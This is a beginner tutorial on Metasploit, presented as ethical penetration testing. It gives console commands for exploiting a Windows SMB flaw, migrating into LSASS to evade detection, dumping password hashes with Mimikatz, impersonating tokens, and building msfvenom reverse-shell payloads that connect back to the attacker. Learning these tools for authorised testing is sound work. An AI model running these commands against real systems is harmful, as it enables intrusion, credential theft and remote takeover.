Metasploit is a hacking framework, much like a Swiss army knife, equipped with numerous tools for conducting penetration tests from start to finish. While it encompasses a wide array of functionalities, this guide will focus on some core components, particularly the auto exploits feature, which simplifies and accelerates the exploitation process. Related Video:
Ethical Hacking Disclaimer
Remember, ethical hacking is about using your skills for legal and constructive purposes. Always ensure you have explicit permission before attempting any penetration testing.
Initial Steps: Finding Vulnerabilities
Before exploiting a system, you need to identify its vulnerabilities. This process involves reconnaissance and enumeration. For instance, using Nmap to scan for open ports and services.
Launching Metasploit
To start Metasploit, use:
msfconsole -q
The -q flag suppresses the ASCII art, keeping your terminal neat.
Searching for Exploits
Use the search function to find relevant exploits. For example, if targeting an Apache vulnerability:
search apache 2.2.2
You can also search by CVE number and anything else that may identify a specific vulnerable service.
A list of modules will appear, and you can select the appropriate one. To select the appropriate module, you can do:
use [search result number]
Example:
use 0
You can also use a module by specifying the exact module you want to use in full like this:
use exploit/windows/smb/ms08_067_netapi
Setting Up and Running the Exploit
Once you’ve chosen a module, configure its options:
use exploit/windows/smb/ms08_067_netapi
set RHOST <target IP>
set RHOST <target IP>
set LHOST <your IP>
set LPORT <listening port>
If you are unsure what options are available to you, you can view options like this:
options
Run the exploit with:
run
or
exploit
If successful, you’ll gain a meterpreter shell, granting you extensive control over the target system.
Post-Exploitation
In the meterpreter shell, you can execute various commands such as:
getuid
shell
upload <local file> <remote path>
download <remote file> <local path>
Migrating Processes
Process migration helps in maintaining a stable connection and evading detection. To migrate into another process, first identify the process ID (PID) of the target process:
pgrep <process_name>
For example, to find the PID of the LSASS process:
pgrep lsass
Then, migrate to the identified process:
migrate <PID>
Replace <PID> with the actual process ID found in the previous step.
Once you migrate into lsass, you can now use Mimikatz.
Using Mimikatz to Dump Password Hashes
One of the powerful tools integrated within Metasploit is Mimikatz, known for its ability to extract plaintext passwords, hash dumps, and more from memory. Let's explore how to use Mimikatz through Metasploit to dump password hashes from a compromised system.
load kiwi
This command loads the Kiwi extension, providing access to Mimikatz commands.
To dump all password hashes from the system, use the following command:
creds_all
This command will list all the password hashes for users on the system, allowing you to see the hashed credentials.
Impersonating Tokens
You can also do token impersonation, which can be useful for maintaining access or escalating privileges further. To list available tokens, use:
list_tokens -u
This will display all user tokens available for impersonation. To impersonate a specific token, use:
impersonate_token <token>
Exploit Suggestor
Additionally, you can escalate privileges using the exploit suggestor. First, you have to background the current meterpreter session:
background
You list all your active sessions with:
sessions
Then, you can see each session's ID. By default, your first session will be '1'.
To use the exploit suggestor:
use post/multi/recon/local_exploit_suggester
set SESSION 1
run
This may provide a list of potential exploits to elevate your access.
Creating Reverse Shells with MSFVenom
Metasploit’s MSFVenom tool allows you to generate payloads for reverse shells:
msfvenom -p windows/meterpreter/reverse_https LHOST=<your IP> LPORT=443 -f aspx -o hacker.aspx
This is just one example of how to use MSFVenom. You can specify many other options, such as Linux, x64, non-meterpreter shells, TCP connections, different file formats, and stageless payloads. For example, a x64-bit Linux machine standard reverse shell could look like this:
msfvenom -p Linux/x64/shell_reverse_tcp LHOST=<your IP> LPORT=443 -f elf -o hacker.elf
You can use the tab autocomplete to see what is available. Overall, MSFVenom is very customizable.
Wrapping Up
This guide covers only the basics of Metasploit. The framework offers a wealth of tools and capabilities to assist in ethical hacking.